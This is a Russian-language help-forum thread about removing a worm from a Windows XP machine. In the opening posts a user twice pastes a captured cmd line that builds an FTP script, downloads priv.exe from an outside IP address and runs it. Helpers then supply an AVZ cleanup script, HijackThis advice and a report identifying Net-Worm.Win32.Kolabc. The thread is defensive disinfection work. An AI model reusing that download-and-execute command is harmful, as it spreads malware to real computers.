наверно сидит зараза
в АВЗ в диспетчере процессов нашел запущен cmd
cmd /k echo open 94.28.169.178 9798 >> ii & echo user 1 1 >> ii & echo get priv.exe >> ii & echo bay >> ii & ftp -n -v -s:ii &del ii &priv.exe|
наверно сидит зараза
в АВЗ в диспетчере процессов нашел запущен cmd
cmd /k echo open 94.28.169.178 9798 >> ii & echo user 1 1 >> ii & echo get priv.exe >> ii & echo bay >> ii & ftp -n -v -s:ii &del ii &priv.exe|
Вы в курсе, что уже давно SP3 вышел.Код:Platform: Windows XP SP1 (WinNT 5.01.2600)
В AVZ -> файл-> Выполнить скрипт
Компьютер перезагрузится.Код:begin SearchRootkit(true, true); SetAVZGuardStatus(True); QuarantineFile('C:\WINDOWS\System32\priv.exe',''); QuarantineFile('C:\WINDOWS\Temp\JET7696.tmp',''); QuarantineFile('C:\WINDOWS\System32\algs.exe',''); DeleteFile('C:\WINDOWS\System32\algs.exe'); DeleteFile('C:\WINDOWS\System32\priv.exe'); DeleteFile('C:\WINDOWS\Temp\JET7696.tmp'); BC_Importall; BC_DeleteSvc('Srpclossgr'); ExecuteSysClean; BC_Activate; RebootWindows(true); end.
Пришлите карантин согласно правил по ссылке http://virusinfo.info/upload_virus.php?tid=41934
Повторите логи по правилам.
в курсе (
логи после скрипта
есть еще файл в recycler - он не удалялся, удалил токо после снятия атрибутов
заархивировал его - посмотрите?
Давайте. Архив с паролем virus сделайте.
Добавлено через 2 минуты
"Пофиксите" в HijackThis
Жалобы есть?Код:O2 - BHO: Acronis Popup Blocker - {E24AD748-155E-4254-B674-4EDF86E7E1DF} - (no file)
Последний раз редактировалось light59; 18.03.2009 в 11:42. Причина: Добавлено
этот файл был в автозагрузке.
Сейчас отключено все по мах - работает вроде нормально
Есть одна проблема UserGate периодически грузит проц на 60% - то ли не замечал раньше, то ли ...
не понял куда архив кидать отправляю через запрошенный
гы, сделал rar, не отправляется - хотел извлечь, в zip сделать - уже не извлекается О.О
Последний раз редактировалось omwolf; 18.03.2009 в 12:18.
Статистика проведенного лечения:
- Получено карантинов: 1
- Обработано файлов: 10
- В ходе лечения обнаружены вредоносные программы:
- c:\windows\system32\algs.exe - Net-Worm.Win32.Kolabc.gbe ( DrWEB: Trojan.Packed.162, BitDefender: Packer.RLPack.D )
- c:\windows\system32\priv.exe - Net-Worm.Win32.Kolabc.ekm ( BitDefender: Backdoor.Bot.53562 )
Уважаемый(ая) omwolf, наши специалисты оказали Вам всю возможную помощь по вашему обращению.
В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:
Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:
Надеемся больше никогда не увидеть ваш компьютер зараженным!
Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.